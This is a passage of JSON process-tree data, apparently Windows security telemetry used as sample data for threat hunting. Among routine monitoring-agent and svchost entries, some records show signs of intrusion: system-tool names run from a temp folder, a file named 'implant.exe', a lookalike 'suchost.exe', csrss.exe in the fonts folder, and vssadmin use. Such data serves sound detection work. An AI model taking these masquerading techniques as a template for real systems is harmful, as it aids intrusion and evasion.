agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ct_602681692\\\\nativedsc\\\\desiredstateconfiguration\\\\asmhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ct_602681692\\\\nativedsc\\\\desiredstateconfiguration\\\\asmhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ct_602681692\\\\nativedsc\\\\desiredstateconfiguration\\\\asmhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ct_602681692\\\\nativedsc\\\\desiredstateconfiguration\\\\asmhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ct_602681692\\\\nativedsc\\\\desiredstateconfiguration\\\\asmhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ct_602681692\\\\nativedsc\\\\desiredstateconfiguration\\\\asmhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ct_602681692\\\\nativedsc\\\\desiredstateconfiguration\\\\asmhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ct_602681692\\\\nativedsc\\\\desiredstateconfiguration\\\\asmhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ct_602681692\\\\nativedsc\\\\desiredstateconfiguration\\\\asmhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ct_602681692\\\\nativedsc\\\\desiredstateconfiguration\\\\asmhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ct_602681692\\\\nativedsc\\\\desiredstateconfiguration\\\\asmhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ct_602681692\\\\nativedsc\\\\desiredstateconfiguration\\\\asmhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ct_602681692\\\\nativedsc\\\\desiredstateconfiguration\\\\asmhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ct_602681692\\\\nativedsc\\\\desiredstateconfiguration\\\\asmhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ct_602681692\\\\nativedsc\\\\desiredstateconfiguration\\\\asmhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ct_602681692\\\\nativedsc\\\\desiredstateconfiguration\\\\asmhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ct_602681692\\\\nativedsc\\\\desiredstateconfiguration\\\\asmhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ct_602681692\\\\nativedsc\\\\desiredstateconfiguration\\\\asmhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ct_602681692\\\\nativedsc\\\\desiredstateconfiguration\\\\asmhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ct_602681692\\\\nativedsc\\\\desiredstateconfiguration\\\\asmhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ct_602681692\\\\nativedsc\\\\desiredstateconfiguration\\\\asmhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ct_602681692\\\\nativedsc\\\\desiredstateconfiguration\\\\asmhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ct_602681692\\\\nativedsc\\\\desiredstateconfiguration\\\\asmhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ct_602681692\\\\nativedsc\\\\desiredstateconfiguration\\\\asmhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ct_602681692\\\\nativedsc\\\\desiredstateconfiguration\\\\asmhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ct_602681692\\\\nativedsc\\\\desiredstateconfiguration\\\\asmhost.exe\",\"NaN\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"NaN\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\net.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\net.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\net.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\net.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\diagnostics\\\\usertmp\\\\regsvr32.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\diagnostics\\\\usertmp\\\\suchost.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\diagnostics\\\\usertmp\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\diagnostics\\\\usertmp\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\diagnostics\\\\usertmp\\\\certutil.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\diagnostics\\\\usertmp\\\\implant.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\diagnostics\\\\usertmp\\\\implant.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\diagnostics\\\\usertmp\\\\implant.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\diagnostics\\\\usertmp\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\diagnostics\\\\usertmp\\\\powershell.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\diagnostics\\\\usertmp\\\\powershell.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\diagnostics\\\\usertmp\\\\powershell.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\diagnostics\\\\usertmp\\\\powershell.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\diagnostics\\\\usertmp\\\\powershell.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\diagnostics\\\\usertmp\\\\powershell.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\diagnostics\\\\usertmp\\\\powershell.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\diagnostics\\\\usertmp\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\diagnostics\\\\usertmp\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\diagnostics\\\\usertmp\\\\powershell.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\diagnostics\\\\usertmp\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\diagnostics\\\\usertmp\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\diagnostics\\\\usertmp\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\diagnostics\\\\usertmp\\\\reg.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\fonts\\\\csrss.exe\",\"c:\\\\windows\\\\system32\\\\win32calc.exe\",\"c:\\\\windows\\\\system32\\\\win32calc.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\diagnostics\\\\usertmp\\\\rundll32.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\net.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\net.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\net.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\net.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\net.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\diagnostics\\\\usertmp\\\\rundll32.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\diagnostics\\\\usertmp\\\\rundll32.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\diagnostics\\\\usertmp\\\\rundll32.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\vssadmin.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\diagnostics\\\\usertmp\\\\wuauclt.exe\",\"c:\\\\windows\\\\softwaredistribution\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\diagnostics\\\\usertmp\\\\lsass.exe\",\"c:\\\\windows\\\\softwaredistribution\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"NaN\",\"c:\\\\windows\\\\system32\\\\services.exe\",\"c:\\\\windows\\\\system32\\\\services.exe\",\"c:\\\\windows\\\\system32\\\\services.exe\",\"c:\\\\windows\\\\system32\\\\services.exe\",\"NaN\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\waappagent.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"NaN\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\dism.exe\",\"c:\\\\windows\\\\system32\\\\dism.exe\"],\"path\":[\"363\",\"363/0\",\"363/1\",\"363/1/2\",\"363/10\",\"363/102\",\"363/103\",\"363/104\",\"363/104/105\",\"363/107\",\"363/108\",\"363/109\",\"363/109/110\",\"363/11\",\"363/11/12\",\"363/112\",\"363/113\",\"363/114\",\"363/114/115\",\"363/117\",\"363/118\",\"363/119\",\"363/119/120\",\"363/122\",\"363/123\",\"363/124\",\"363/124/125\",\"363/127\",\"363/128\",\"363/130\",\"363/130/131\",\"363/133\",\"363/134\",\"363/134/135\",\"363/136\",\"363/137\",\"363/137/138\",\"363/14\",\"363/140\",\"363/141\",\"363/142\",\"363/142/143\",\"363/145\",\"363/146\",\"363/147\",\"363/147/148\",\"363/15\",\"363/150\",\"363/151\",\"363/152\",\"363/152/153\",\"363/155\",\"363/156\",\"363/157\",\"363/157/158\",\"363/16\",\"363/16/17\",\"363/161\",\"363/162\",\"363/163\",\"363/163/164\",\"363/166\",\"363/19\",\"363/20\",\"363/22\",\"363/22/23\",\"363/25\",\"363/26\",\"363/27\",\"363/27/28\",\"363/30\",\"363/31\",\"363/33\",\"363/33/34\",\"363/338\",\"363/339\",\"363/339/340\",\"363/342\",\"363/343\",\"363/344\",\"363/344/345\",\"363/347\",\"363/348\",\"363/349\",\"363/349/350\",\"363/352\",\"363/353\",\"363/354\",\"363/354/355\",\"363/357\",\"363/358\",\"363/359\",\"363/359/360\",\"363/36\",\"363/362\",\"363/38\",\"363/39\",\"363/39/40\",\"363/4\",\"363/42\",\"363/43\",\"363/44\",\"363/44/45\",\"363/47\",\"363/48\",\"363/5\",\"363/50\",\"363/50/51\",\"363/53\",\"363/56\",\"363/57\",\"363/57/58\",\"363/6\",\"363/6/7\",\"363/60\",\"363/61\",\"363/62\",\"363/62/63\",\"363/65\",\"363/66\",\"363/67\",\"363/67/68\",\"363/70\",\"363/71\",\"363/72\",\"363/72/73\",\"363/76\",\"363/79\",\"363/80\",\"363/80/81\",\"363/83\",\"363/86\",\"363/87\",\"363/89\",\"363/89/90\",\"363/9\",\"363/92\",\"363/93\",\"363/94\",\"363/94/95\",\"363/97\",\"363/98\",\"363/99\",\"363/99/100\",\"364\",\"364/101\",\"364/106\",\"364/111\",\"364/116\",\"364/121\",\"364/126\",\"364/129\",\"364/13\",\"364/132\",\"364/139\",\"364/144\",\"364/149\",\"364/154\",\"364/160\",\"364/165\",\"364/167\",\"364/18\",\"364/181\",\"364/24\",\"364/29\",\"364/3\",\"364/341\",\"364/346\",\"364/35\",\"364/351\",\"364/356\",\"364/361\",\"364/41\",\"364/46\",\"364/49\",\"364/52\",\"364/55\",\"364/59\",\"364/64\",\"364/69\",\"364/74\",\"364/8\",\"364/82\",\"364/88\",\"364/91\",\"364/96\",\"365\",\"365/159\",\"365/168\",\"365/168/169\",\"365/168/170\",\"365/168/171\",\"365/168/172\",\"365/168/172/173\",\"365/168/174\",\"365/168/174/175\",\"365/168/178\",\"365/168/182\",\"365/168/183\",\"365/168/183/184\",\"365/168/185\",\"365/168/185/186\",\"365/168/187\",\"365/168/187/189\",\"365/168/190\",\"365/168/190/191\",\"365/168/192\",\"365/168/192/193\",\"365/168/194\",\"365/168/194/195\",\"365/168/196\",\"365/168/196/197\",\"365/168/198\",\"365/168/198/204\",\"365/168/199\",\"365/168/199/203\",\"365/168/200\",\"365/168/200/202\",\"365/168/201\",\"365/168/201/205\",\"365/168/206\",\"365/168/206/207\",\"365/168/208\",\"365/168/208/209\",\"365/168/210\",\"365/168/210/211\",\"365/168/212\",\"365/168/212/213\",\"365/168/214\",\"365/168/214/215\",\"365/168/216\",\"365/168/216/217\",\"365/168/218\",\"365/168/218/219\",\"365/168/220\",\"365/168/220/221\",\"365/168/222\",\"365/168/222/223\",\"365/168/224\",\"365/168/224/225\",\"365/168/226\",\"365/168/226/227\",\"365/168/228\",\"365/168/228/229\",\"365/168/230\",\"365/168/230/231\",\"365/168/232\",\"365/168/232/233\",\"365/168/234\",\"365/168/234/235\",\"365/168/234/235/237\",\"365/168/234/235/238\",\"365/168/239\",\"365/168/240\",\"365/168/241\",\"365/168/241/242\",\"365/168/243\",\"365/168/244\",\"365/168/245\",\"365/168/245/246\",\"365/168/247\",\"365/168/248\",\"365/168/249\",\"365/168/250\",\"365/168/250/251\",\"365/168/252\",\"365/168/252/253\",\"365/168/254\",\"365/168/254/255\",\"365/168/256\",\"365/168/257\",\"365/168/258\",\"365/168/259\",\"365/168/260\",\"365/168/261\",\"365/168/262\",\"365/168/263\",\"365/168/264\",\"365/168/265\",\"365/168/265/266\",\"365/168/267\",\"365/168/268\",\"365/168/269\",\"365/168/270\",\"365/168/271\",\"365/168/272\",\"365/168/272/273\",\"365/168/274\",\"365/168/275\",\"365/168/275/276\",\"365/168/277\",\"365/168/278\",\"365/168/278/279\",\"365/168/280\",\"365/168/281\",\"365/168/282\",\"365/168/283\",\"365/168/284\",\"365/168/285\",\"365/168/286\",\"365/168/287\",\"365/168/288\",\"365/168/289\",\"365/168/290\",\"365/168/291\",\"365/168/292\",\"365/168/293\",\"365/168/293/294\",\"365/168/295\",\"365/168/295/296\",\"365/168/297\",\"365/168/298\",\"365/168/299\",\"365/168/300\",\"365/168/301\",\"365/168/302\",\"365/168/303\",\"365/168/304\",\"365/168/305\",\"365/168/305/306\",\"365/168/305/306/307\",\"365/168/308\",\"365/168/308/309\",\"365/168/308/309/310\",\"365/168/311\",\"365/168/312\",\"365/168/313\",\"365/168/314\",\"365/168/315\",\"365/168/316\",\"365/168/317\",\"365/168/318\",\"365/168/319\",\"365/168/320\",\"365/168/321\